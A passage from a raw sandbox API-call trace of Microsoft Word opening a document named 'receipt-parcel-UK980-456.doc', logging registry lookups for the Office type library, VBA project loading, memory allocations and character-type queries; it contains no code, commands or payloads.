(This=0x7fefe9e5380, cb=0x136) returned 0x79da0f0 [0016.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", cchWideChar=155, lpMultiByteStr=0x79da0f0, cbMultiByte=310, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", lpUsedDefaultChar=0x0) returned 155 [0016.976] IMalloc:Free (This=0x7fefe9e5380, pv=0x79da0f0) [0016.976] wcscpy_s (in: _Destination=0x551e6e8, _SizeInWords=0x9b, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0016.976] wcsncpy_s (in: _Destination=0x286710, _SizeInWords=0x108, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0016.976] CharLowerBuffW (in: lpsz="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchLength=0x9a | out: lpsz="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library") returned 0x9a [0016.976] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x136) returned 0x79da0f0 [0016.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", cchWideChar=155, lpMultiByteStr=0x79da0f0, cbMultiByte=310, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", lpUsedDefaultChar=0x0) returned 155 [0016.976] IMalloc:Free (This=0x7fefe9e5380, pv=0x79da0f0) [0016.976] wcsncpy_s (in: _Destination=0x2866d0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 0x0 [0016.976] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", cchLength=0x39 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc") returned 0x39 [0016.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc", cchWideChar=58, lpMultiByteStr=0x286600, cbMultiByte=116, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc", lpUsedDefaultChar=0x0) returned 58 [0016.976] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 0 [0016.976] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Office") returned 0x107515 [0016.976] strcpy_s (in: _Dst=0x286790, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0016.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286790, cbMultiByte=7, lpWideCharStr=0x2865e0, cchWideChar=7 | out: lpWideCharStr="Office") returned 7 [0016.976] IUnknown:AddRef (This=0x788e200) returned 0x3 [0016.976] ITypeLib:RemoteIsName (in: This=0x788e200, szNameBuf="Office", lHashVal=0x107515, pfName=0x2866b0, pBstrLibName=0x2865e0 | out: pfName=0x2866b0*=0, pBstrLibName=0x2865e0) returned 0x0 [0016.976] IUnknown:Release (This=0x788e200) returned 0x2 [0016.976] IUnknown:AddRef (This=0x72e0930) returned 0x3 [0016.976] ITypeLib:RemoteIsName (in: This=0x72e0930, szNameBuf="Office", lHashVal=0x107515, pfName=0x2866b0, pBstrLibName=0x2865e0 | out: pfName=0x2866b0*=0, pBstrLibName=0x2865e0) returned 0x0 [0016.976] IUnknown:Release (This=0x72e0930) returned 0x2 [0016.976] IUnknown:AddRef (This=0x72df850) returned 0x5 [0016.976] ITypeLib:RemoteIsName (in: This=0x72df850, szNameBuf="Office", lHashVal=0x107515, pfName=0x2866b0, pBstrLibName=0x2865e0 | out: pfName=0x2866b0*=0, pBstrLibName=0x2865e0) returned 0x0 [0016.976] IUnknown:Release (This=0x72df850) returned 0x4 [0016.976] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x208) returned 0x788f870 [0016.977] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x285d90 | out: phkResult=0x285d90*=0x9a2) returned 0x0 [0016.977] RegOpenKeyW (in: hKey=0x9a2, lpSubKey="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}", phkResult=0x285d88 | out: phkResult=0x285d88*=0x9a6) returned 0x0 [0016.977] RegEnumKeyW (in: hKey=0x9a6, dwIndex=0x0, lpName=0x285db8, cchName=0xa | out: lpName="2.6") returned 0x0 [0016.977] RegEnumKeyW (in: hKey=0x9a6, dwIndex=0x1, lpName=0x285db8, cchName=0xa | out: lpName="2.7") returned 0x0 [0016.977] RegEnumKeyW (in: hKey=0x9a6, dwIndex=0x2, lpName=0x285db8, cchName=0xa | out: lpName="2.8") returned 0x0 [0016.977] wcscpy_s (in: _Destination=0x285da0, _SizeInWords=0xa, _Source="2.8" | out: _Destination="2.8") returned 0x0 [0016.977] RegOpenKeyW (in: hKey=0x9a6, lpSubKey="2.8", phkResult=0x285e48 | out: phkResult=0x285e48*=0x9b2) returned 0x0 [0016.978] _ultoa_s (in: _Val=0x0, _DstBuf=0x285dc0, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0016.978] RegOpenKeyA (in: hKey=0x9b2, lpSubKey="0", phkResult=0x285db0 | out: phkResult=0x285db0*=0x9ba) returned 0x0 [0016.978] RegOpenKeyW (in: hKey=0x9ba, lpSubKey="win64", phkResult=0x285db8 | out: phkResult=0x285db8*=0x9c2) returned 0x0 [0016.978] RegCloseKey (hKey=0x9c2) returned 0x0 [0016.978] RegCloseKey (hKey=0x9ba) returned 0x0 [0016.978] _ultow_s (in: _Value=0x0, _Buffer=0x285e50, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0016.978] RegOpenKeyW (in: hKey=0x9b2, lpSubKey="0", phkResult=0x285e28 | out: phkResult=0x285e28*=0x9b6) returned 0x0 [0016.978] RegQueryValueW (in: hKey=0x9b6, lpSubKey="win64", lpData=0x285e70, lpcbData=0x285e24 | out: lpData="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", lpcbData=0x285e24) returned 0x0 [0016.979] wcscpy_s (in: _Destination=0x788f870, _SizeInWords=0x104, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0016.979] RegCloseKey (hKey=0x9b6) returned 0x0 [0016.979] RegCloseKey (hKey=0x9b2) returned 0x0 [0016.979] RegCloseKey (hKey=0x9a6) returned 0x0 [0016.979] RegCloseKey (hKey=0x9a2) returned 0x0 [0016.993] IUnknown:QueryInterface (in: This=0x788df30, riid=0x7fef1036290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x286298 | out: ppvObject=0x286298*=0x0) returned 0x80004002 [0016.993] ITypeLib:RemoteGetLibAttr (in: This=0x788df30, ppTLibAttr=0x286290, pDummy=0x10 | out: ppTLibAttr=0x286290, pDummy=0x10) returned 0x0 [0016.993] ITypeLib:RemoteGetDocumentation (in: This=0x788df30, index=-1, refPtrFlags=0x0, pbstrName=0x286288, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x2e14ee6 | out: pbstrName=0x286288*="Microsoft Office 16.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x2e14ee6) returned 0x0 [0016.993] StringFromGUID2 (in: rguid=0x7831cb0*(Data1=0x2df8d04c, Data2=0x5bfa, Data3=0x101b, Data4=([0]=0xbd, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0xde, [7]=0x52)), lpsz=0x2862b0, cchMax=39 | out: lpsz="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 39 [0016.993] _ultow_s (in: _Value=0x2, _Buffer=0x2861fa, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0016.993] _ultow_s (in: _Value=0x8, _Buffer=0x2861fe, _BufferCount=0xe, _Radix=16 | out: _Buffer="8") returned 0x0 [0016.993] _ultow_s (in: _Value=0x0, _Buffer=0x286202, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0016.994] wcscpy_s (in: _Destination=0xbcedba8, _SizeInWords=0x95, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0016.994] wcscpy_s (in: _Destination=0xbcedbae, _SizeInWords=0x92, _Source="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}" | out: _Destination="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 0x0 [0016.994] wcscpy_s (in: _Destination=0xbcedbfa, _SizeInWords=0x6c, _Source="#2.8#0#" | out: _Destination="#2.8#0#") returned 0x0 [0016.994] wcscpy_s (in: _Destination=0xbcedc08, _SizeInWords=0x65, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0016.994] wcscpy_s (in: _Destination=0xbcedc88, _SizeInWords=0x25, _Source="Microsoft Office 16.0 Object Library" | out: _Destination="Microsoft Office 16.0 Object Library") returned 0x0 [0016.994] ITypeLib:LocalReleaseTLibAttr (This=0x788df30) returned 0x0 [0016.994] wcscpy_s (in: _Destination=0xbcccb88, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0016.994] IMalloc:Free (This=0x7fefe9e5380, pv=0x788f870) [0016.994] ITypeLib:RemoteIsName (in: This=0x788df30, szNameBuf="Office", lHashVal=0x107515, pfName=0x2866b0, pBstrLibName=0x2865e0 | out: pfName=0x2866b0*=0, pBstrLibName=0x2865e0) returned 0x0 [0016.994] IUnknown:Release (This=0x788df30) returned 0x1 [0016.994] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x3c) returned 0x77e03e0 [0016.994] IMalloc:Free (This=0x7fefe9e5380, pv=0x79207c0) [0016.994] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x778c1d0 [0016.994] IMalloc:Free (This=0x7fefe9e5380, pv=0x77e03e0) [0016.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x2867f0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0016.996] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0016.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x286930, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0016.996] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0016.996] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x80) returned 0x7934ad0 [0016.996] IMalloc:GetSize (This=0x7fefe9e5380, pv=0x7934ad0) returned 0x80 [0016.996] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xb8) returned 0x79f5010 [0016.996] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xb8) returned 0x79f50d0 [0016.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x2867f0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0016.996] CoCreateGuid (in: pguid=0x286520 | out: pguid=0x286520*(Data1=0x6e56ce96, Data2=0xd7b2, Data3=0x4da6, Data4=([0]=0x8a, [1]=0x7a, [2]=0xd8, [3]=0xcb, [4]=0xa1, [5]=0xb2, [6]=0x1c, [7]=0xe))) returned 0x0 [0016.996] CoCreateGuid (in: pguid=0x286530 | out: pguid=0x286530*(Data1=0xe2e9b77c, Data2=0x280, Data3=0x496d, Data4=([0]=0x94, [1]=0x4f, [2]=0x5, [3]=0xcd, [4]=0x7f, [5]=0x4f, [6]=0xf3, [7]=0xfc))) returned 0x0 [0016.996] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x286540, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0016.996] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0016.996] GetLocalTime (in: lpSystemTime=0x286418 | out: lpSystemTime=0x286418*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0xa, wMinute=0x31, wSecond=0x7, wMilliseconds=0x1c2)) [0016.996] _ultow_s (in: _Value=0x5c2b45a3, _Buffer=0xbccc93c, _BufferCount=0x9, _Radix=16 | out: _Buffer="5c2b45a3") returned 0x0 [0016.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="015c2b45a3", cchWideChar=11, lpMultiByteStr=0x2863b0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="015c2b45a3", lpUsedDefaultChar=0x0) returned 11 [0016.996] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x170) returned 0x79d7cd0 [0016.996] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x50) returned 0x78a2150 [0016.996] strcpy_s (in: _Dst=0x79e0338, _DstSize=0xd, _Src="ThisDocument" | out: _Dst="ThisDocument") returned 0x0 [0016.996] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0016.996] wcscpy_s (in: _Destination=0xbccc950, _SizeInWords=0xd, _Source="ThisDocument" | out: _Destination="ThisDocument") returned 0x0 [0016.996] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0016.996] wcscpy_s (in: _Destination=0xbccc970, _SizeInWords=0xd, _Source="ThisDocument" | out: _Destination="ThisDocument") returned 0x0 [0016.996] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0016.996] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x48) returned 0x77e0480 [0016.996] IMalloc:Free (This=0x7fefe9e5380, pv=0x79207c0) [0016.996] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x778c1d0 [0016.997] IMalloc:Free (This=0x7fefe9e5380, pv=0x77e0480) [0016.997] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x3d0) returned 0x7a786c0 [0016.997] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x778c1d0 [0016.997] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x10) returned 0x79782c0 [0016.997] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x80) returned 0x7934b60 [0016.997] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0x790db60 [0016.997] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0x790db80 [0016.997] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x688) returned 0xbccd320 [0016.997] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x80) returned 0x7934bf0 [0016.997] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x640) returned 0xbd37e30 [0016.997] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x778c1a0 [0016.997] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0x790dc70 [0016.997] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0xbd0f090 [0016.997] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x778c170 [0016.997] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x80) returned 0x7934c80 [0016.997] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x400) returned 0x7a5cbb0 [0016.997] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x400) returned 0x7a5cfc0 [0016.997] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x400) returned 0x7a5d3d0 [0016.997] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0016.997] strcpy_s (in: _Dst=0x286580, _DstSize=0xa, _Src="_Evaluate" | out: _Dst="_Evaluate") returned 0x0 [0016.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286580, cbMultiByte=10, lpWideCharStr=0x2863d0, cchWideChar=10 | out: lpWideCharStr="_Evaluate") returned 10 [0016.997] IUnknown:AddRef (This=0x788e200) returned 0x3 [0016.997] ITypeLib:RemoteIsName (in: This=0x788e200, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x2864a0, pBstrLibName=0x2863d0 | out: pfName=0x2864a0*=0, pBstrLibName=0x2863d0) returned 0x0 [0016.997] IUnknown:Release (This=0x788e200) returned 0x2 [0016.997] IUnknown:AddRef (This=0x72e0930) returned 0x3 [0016.997] ITypeLib:RemoteIsName (in: This=0x72e0930, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x2864a0, pBstrLibName=0x2863d0 | out: pfName=0x2864a0*=0, pBstrLibName=0x2863d0) returned 0x0 [0016.997] IUnknown:Release (This=0x72e0930) returned 0x2 [0016.997] IUnknown:AddRef (This=0x72df850) returned 0x5 [0016.997] ITypeLib:RemoteIsName (in: This=0x72df850, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x2864a0, pBstrLibName=0x2863d0 | out: pfName=0x2864a0*=0, pBstrLibName=0x2863d0) returned 0x0 [0016.998] IUnknown:Release (This=0x72df850) returned 0x4 [0016.998] IUnknown:AddRef (This=0x788df30) returned 0x2 [0016.998] ITypeLib:RemoteIsName (in: This=0x788df30, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x2864a0, pBstrLibName=0x2863d0 | out: pfName=0x2864a0*=1, pBstrLibName=0x2863d0) returned 0x0 [0016.998] IUnknown:Release (This=0x788df30) returned 0x1 [0016.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_Evaluate", cchWideChar=-1, lpMultiByteStr=0x286580, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_Evaluate", lpUsedDefaultChar=0x0) returned 10 [0016.998] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0016.998] wcsncpy_s (in: _Destination=0x286590, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 0x0 [0016.998] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", cchLength=0x39 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc") returned 0x39 [0016.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc", cchWideChar=58, lpMultiByteStr=0x2864c0, cbMultiByte=116, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc", lpUsedDefaultChar=0x0) returned 58 [0016.998] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 0 [0016.998] CExposedDocFile::AddRef () returned 0x3 [0016.998] CExposedDocFile::AddRef () returned 0x4 [0016.998] CExposedDocFile::OpenStream () returned 0x0 [0016.998] CExposedDocFile::Release () returned 0x3 [0016.998] CExposedStream::Seek () returned 0x0 [0016.998] CExposedStream::AddRef () returned 0x2 [0016.998] CExposedStream::Read () returned 0x0 [0016.998] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x2028) returned 0xbd38480 [0016.999] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x10020*=0x10128) returned 0xbd3a4b0 [0016.999] CExposedStream::AddRef () returned 0x3 [0016.999] CExposedStream::Release () returned 0x2 [0016.999] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x2ee0) returned 0xbd4a4e0 [0016.999] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x800) returned 0x76d35a0 [0016.999] CExposedStream::Read () returned 0x0 [0016.999] CExposedStream::Read () returned 0x0 [0017.000] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x404) returned 0x7a5d7e0 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x80", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x81", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x82", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x83", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x84", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="…", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x86", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x87", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x88", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x89", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8a", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8b", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8c", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8d", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8e", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8f", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x90", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x91", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x92", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x93", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x94", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x95", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x96", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x97", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x98", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x99", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9a", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9b", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9c", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9d", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9e", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9f", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr=" ", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¡", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¢", cchSrc=1, lpCharType=0x286690 | out: lpCharType=0x286690) returned 1 [0017.000] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="£", cchSrc=1, 